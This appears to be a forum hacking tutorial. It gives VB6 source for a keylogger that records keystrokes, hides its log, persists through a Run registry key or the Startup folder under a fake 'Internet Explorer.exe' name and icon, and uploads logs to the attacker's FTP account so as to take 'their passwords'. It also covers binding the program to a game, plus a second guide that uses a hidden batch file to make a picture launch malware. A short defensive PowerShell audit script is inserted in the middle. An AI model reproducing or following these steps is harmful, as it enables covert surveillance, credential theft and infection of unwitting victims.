Now, two very important keycodes are missing on the site, so I put them here:
Dot: Getasynckeystate(190)
Comma: Getasynckeystate(188)

We are now able to go to the next step: writing to a text document.

Having the logs in a label is not enough. We need to write them to a text file every now and then.
This process is really simple actually. Open up the source for the second timer (Timer2)
and write the following:
 On Error GoTo skip
If Dir("c:\windows\klogs.txt") <> "" Then
Open "c:\windows\klogs.txt" For Append As #1
Write #1, Label1.Caption
Close #1
Else
Open "c:\windows\klogs.txt" For Output As #1
Write #1, DateTime.Time
Write #1,
Write #1, Label1.Caption
Close #1
End If
Label1.Caption = ""
skip:
 
Don't worry, I'll explain.
The Dir command checks if a file exists. If it exists, it executes the code below it; if it does not exist, it executes the code below "Else".
The "Open" creates/opens a text file, in this case klogs.txt; you can change this. You can also change the location of it. Just locate it somewhere the victim won't look.
The "for output as #1" just gives the file a number so it knows what file to write to later on (in case more files are open). Output writes the text file, Input reads the text file, and Append adds more text to the existing text in the file. Also, as you may notice, if the file does not exist then it writes the time of day into the file. This is useful for keeping track of when the specific log is from. In this case we only use Output and Append.
"write #1, label1.caption" writes the content of our label into file #1.
"close #1" closes the file.
'Label1.caption = ""' deletes the content of our Label1, which stores the info. We don't want to write the same stuff to the file again.
Now don't worry, all of this writing and creating happens invisibly.
I suggest doing this every 30-60 seconds (30 seconds = an interval of 30000 on the timer).

As said above, we write the time of day into the log file to help us keep track of it. When the file is first created it will write the time into it. But that's not quite good enough for us. We want it to write the time into the file every time the keylogger is opened again (usually after a shutdown).
So write this in "Form_Load":
 
 If Dir("c:\windows\klogs.txt") <> "" Then
open "c:\windows\klogs.txt" for append as #1
write #1,
write #1, DateTime.time
write #1,
close #1 
 
So now it stores time marks every time it's opened.

NEAT! Now every 30-60 seconds all logs are stored in a text document.
At this point you should try debugging the file (little blue triangle button).

You will see nothing, but the keylogger is running. Try opening Notepad or something and type something. After a minute or so, stop debugging (square button right of the debug button) and check the text file (at your chosen location).
It should contain everything you wrote. If not, re-check the last steps.

Now, an important thing we must not forget is to make it run on startup =)
There are 2 ways to do that. I will explain them both and let you choose which one to use.

1: Registry keys

Here we copy the file to system32 and add an autorun registry key for it so it starts when you start the computer. Here's how to do it:

First we want to see if it already has a startup key. Go to the Form_Load section again and write this:
if Dir("c:\windows\system32\Internet Explorer.exe") <> "" then
else
regist
end if
 
This means that if the file in system32 (Internet Explorer.exe) already exists (I will explain the name later) then it does nothing,
but if the file does not exist, it calls the sub called "regist", which copies the file and adds a registry key for it. We're going to write the "regist" sub now.

Add this at the bottom of the code:
Private Sub regist()
Dim regkey
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\windows\system32\Internet Explorer.exe"
Set regkey = CreateObject("wscript.shell")
regkey.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Internet Explorer.exe", "c:\windows\system32\Internet Explorer.exe"
End Sub

It copies the file itself to system32 as Internet Explorer.exe (will explain in a moment), and then adds an autorun key for it.

That's basically the registry method. Here is the other method.

2: Copy to startup method.

Again, start by going to Form_Load (IF you choose to use this method) and add "startup", which calls the startup sub we are about to make.
Make a new sub called startup at the bottom of the code, like this:
Private Sub startup()
Dim startpath
Dim path As String
Set startpath = CreateObject("WScript.Shell")
path = startpath.Specialfolders("Startup")
FileCopy app.path & "\" & App.EXEName & ".exe", path & "\Internet Explorer.exe"
End Sub
 
This looks up the special folder "Startup" and copies itself there with the Internet Explorer name.

If you want you can add VB attributes (SetAttr commands), like vbHidden or vbSystem, but I don't recommend that because I had some problems with those attributes myself.

Now choose one of the methods for startup (not both of them though) and move on.
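From the defender's side, the two persistence methods above both land in locations an administrator can audit in seconds. The following PowerShell is an added example (not from the tutorial) that enumerates the HKLM/HKCU Run keys and the Startup folders and flags entries that match the disguise the tutorial describes: a browser-like name, an executable with a space in its name inside system32, a missing target, or an unsigned binary. The name patterns and the "Internet Explorer.exe" path are taken from the text; the heuristics themselves are assumptions.

```powershell
# Added example: audit the autostart locations abused above. Run as admin
# on Windows; the heuristics are assumptions, not a vendor detection rule.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
$startupDirs = @(
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
)

function Test-SuspiciousAutostart {
    param([string]$Source, [string]$Name, [string]$Path)
    $exe = [IO.Path]::GetFileName($Path)
    $reasons = @()
    # An autostart entry named after a browser or messenger is a common disguise.
    if ($exe -match '^(Internet Explorer|iexplore|chrome|firefox|msn)') {
        $reasons += 'name mimics a browser/messenger'
    }
    # Genuine system32 binaries do not carry spaces; "Internet Explorer.exe" there is odd.
    if ($Path -match '\\system32\\' -and $exe -match ' ') {
        $reasons += 'executable with a space in its name inside system32'
    }
    if (Test-Path -LiteralPath $Path) {
        $sig = Get-AuthenticodeSignature -FilePath $Path
        if ($sig.Status -ne 'Valid') { $reasons += "signature status: $($sig.Status)" }
    } else {
        $reasons += 'target file missing'
    }
    if ($reasons.Count -gt 0) {
        [pscustomobject]@{ Source = $Source; Name = $Name; Path = $Path; Reasons = ($reasons -join '; ') }
    }
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip the provider's PSPath/PSDrive metadata
        # Reduce a command line to its executable: quoted path first, else first .exe token.
        $path = ($p.Value -replace '^"([^"]+)".*$', '$1') -replace '^(\S+\.exe).*$', '$1'
        Test-SuspiciousAutostart -Source $key -Name $p.Name -Path $path
    }
}

foreach ($dir in $startupDirs) {
    # -Force lists files marked hidden, which the tutorial suggests doing with vbHidden.
    Get-ChildItem -LiteralPath $dir -Force -File -ErrorAction SilentlyContinue |
        ForEach-Object { Test-SuspiciousAutostart -Source $dir -Name $_.Name -Path $_.FullName }
}
```

An unquoted value containing a space (such as the tutorial's c:\windows\system32\Internet Explorer.exe) is left whole by the regexes, so it is still checked in full.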

Now, the final part is the most important one.
This is where we upload the text file to our FTP account. You MUST have your own FTP account for this part. I suggest using http://www.0catch.com (it's a zero); there you can create a free account.
Create a free FTP account there.
Once you have your FTP account, we need to add an Internet Transfer Control component to our form. You do that by going to Project >> Components (Ctrl + T).
Find Microsoft Internet Transfer Control 6.0 and tick it.

Press OK.
Now a new item is available in the toolbox (Inet). Drag it to your form.
Select properties for it:
Protocol: icFTP
Username: Username.0catch.com (your 0catch username)
Password: your 0catch Password
Remotehost: http://www.0catch.com
And that's it.
Now the "URL" should say something like this:
ftp://username.0catch.com:password@0catch.com

Now we are connected to the FTP server when the program is executed.

We must use this connection to upload the logs to the FTP server. We want to do that about every 90 seconds (since 90 seconds is the max interval in timers).
Set Timer3's interval to 90000 (1½ minutes) or less.
Then in Timer3's source write this:
 
On error resume next
Inet1.Execute , "PUT c:\windows\klogs.txt /" & DateTime.Date & ".txt"

Now, this finds our log (klogs.txt) and uploads it to the selected FTP server. The file's name will be the date of the day it is being run. This is so we prevent overwriting previous logs by creating a new log for every day. This also makes it easier to find the log you need.
The "On error resume next" prevents the program from crashing if one log fails to upload; it just tries again next time (errors happen rarely, but it's recommended to have).

If you have a subfolder for the logs you can type "/subfolder/" & DateTime.Date & ".txt".

Was that it? YES! It's really that easy to upload a file. Woowee!

Now, in the "Load" part add this:
label1.caption = ""
to make sure the label is empty when opened.

Now, I also promised to show the lazy way, which is not as good.

I DO NOT RECOMMEND USING THIS:
This method uses an integer and a loop to do all keys.
dim i as integer
for i = 1 to 120
if GetAsyncKeyState(i) <> 0 then
label1.caption = label1.caption + chr(i)
end if
next  

In this method "i" runs from 1 to 120. "i" starts at 1, and every time it reaches the "next" command it goes back to "for" as 1 higher, until 120.
All letters will be caps and a lot of weird symbols will appear.
"chr(i)": chr = character, and "i" is, again, the keycode.
AGAIN: I RECOMMEND IGNORING THIS PART OF THE GUIDE. It's not that good.

Now, go to the design view again and click the form itself (not any of the items inside the form). Look through the options and find the Icon option. Change the icon to the Internet Explorer icon.

Guess what, we're almost done. We should now have a very undetectable keylogger (80-95% UD).
NICE! Give it a test shot on your own computer by saving it as an .EXE to your computer (debugging won't work now since we made it copy itself).
At this point you should save the project to your computer; you can also make the EXE file (save as Internet Explorer.exe).
That's it for the first part. Get ready for part 2!

Setting it up to be trustworthy
Now, an EXE file that appears to do nothing when opened seems a little suspicious, doesn't it?
So there are a few ways to disguise it:
1. Binding it with another file.
2. Writing another program into it in VB6.

I prefer the first solution, since it takes a long time to make it look like the game etc. closes when the close button is pressed,
and it would take multiple forms as well. So we will stick with binding it with another file or game of yours.
DO NOT use minor binding tools like FreshBind or alike. Many of these make the output detectable.
USE nBinder PRO; nBinder only makes it slightly more detectable.
 
Once you have nBinder PRO it's time to make the keylogger EXE.
You do that in File >> Make project.EXE (save as Internet Explorer.exe, will explain).
When the EXE is created it's time to find a file (preferably a game or alike) to bind it with.

Open up nBinder PRO.
Add the keylogger and the file to be bound with it.
Right-click the keylogger (inside nBinder) and select Options.
Tick the "Execute" box (if not already ticked) and tick the "Start visible" box (if not already ticked).
Untick "Delete file at next boot" if you want the keylogger to stay in the file after the first boot.
Now select Options on the other file.
IMPORTANT: tick "Execute" and "Start visible" here.
Untick "Delete at next boot".
Now select the icon file and output name, and compress the file.
Almost done now.

The reason it should be called Internet Explorer.exe and have the Internet Explorer icon (and copy itself as Internet Explorer.exe, for that matter) is that some firewalls detect the FTP file uploading. When the time comes that the firewall asks if you want to allow the program an internet connection, it will ask "Internet Explorer is trying to access the internet. Block / Remove Block" and display the Internet Explorer icon. That way it looks like it's just IE that tries to get to the internet. You can use other browsers for this as well, or a messenger etc.

Now, my friend, when the file is executed the game (or whatever) will launch immediately. When the game is exited the keylogger starts logging invisibly (and is copied to startup / a registry key is added). The victim shouldn't notice a thing,
and very soon you will be the owner of their passwords =).

That's it for this tutorial on keylogging.
 

Infect Victim with Pixs

Okay, now in this tutorial I will show you how one may spread their virus with pictures, and no binder whatsoever.
It can easily be found by someone with decent knowledge of PCs, so be wary of using this method and don't use it for mass spreading. However, it works wonderfully when you have a friend or someone you might personally know whom you want to open your servers.


Step 1.
Go to your desktop or a commonly known place and make a new folder. Simple, right? Right...

Step 2.
Add your server to that folder and name it whatever you would like it to be called. It doesn't really matter what you call it, because as long as the person doesn't get suspicious of you, they are not going to see that your server lies in this folder.

Step 3.
Decide which picture you'd like to open your virus when it's looked at. This shouldn't be too hard; you probably have an idea of what your victim likes and what pics they would open in the first place.
For my example I will be using a picture that means nothing to anyone and simply states "you have been hacked".

Step 4.
Go to the folder in which you've put your picture and your server and open a new Notepad document.
We are going to write a .bat (batch) file into this Notepad document. If you know how a start command is written in batch, do so now, as that is what we are doing; if not, read below...
First type
"@echo off."

On the next line type "@start"

then a space ON THAT LINE, then type the name of your server.
In this example it is "fakeserver.exe"

Add one additional space after that and, on the same line, put in quotation marks "C:\Documents and Settings\current user\Desktop\"your folder"

Hit Enter to go to a new line and type "@end" after your opening path.

Save as "whatever".bat. All that matters is that we name this file with the extension ".bat" after you name it...



Step 5.
Go to the folder that you've created for this project and right-click the picture that you are using to host your server.

Select "Properties" at the very bottom of this list.
On the Properties screen there should be a bar that says:
Type of file: JPEG image
Opens with: unknown application

Next to the "Opens with" line there should be a button which says "Change". Hit this button and select the .bat file that you created. Hit OK and then go to the bottom of the Properties screen and select "Apply".

What this does is make your batch file run whenever your picture is clicked on; that batch file then executes your server on the victim's machine...

Step 6.
Right-click both your server and your batch file, select "Hidden" and hit the Apply button.
Now they can't be seen unless the person shows hidden files on their system or uses the search feature, and when the pic is opened it will run your server as you made it to do!

And now for a quick recap of the steps with pics (image captions only):

- Server and pic both in folder
- Creating the .bat file to start the server
- Setting your pic to open with the .bat file
- Showing how to set the pic to run with the .bat
- Showing how to hide both server and .bat file from common eyes
- Notice it appears that there is only one pic in the folder?
- But there are really 3 files there..


Optionally, if your victim is a rather suspicious person and will go snooping when no picture opens for them, add another start command to your .bat leading to a copy of the picture that is hidden as well.
So now you know the way that I may or may not infect victims with pictures (or other files of your choosing, really). If you have a spin on this or an adaptation with your own methods to improve this one, feel free to add it.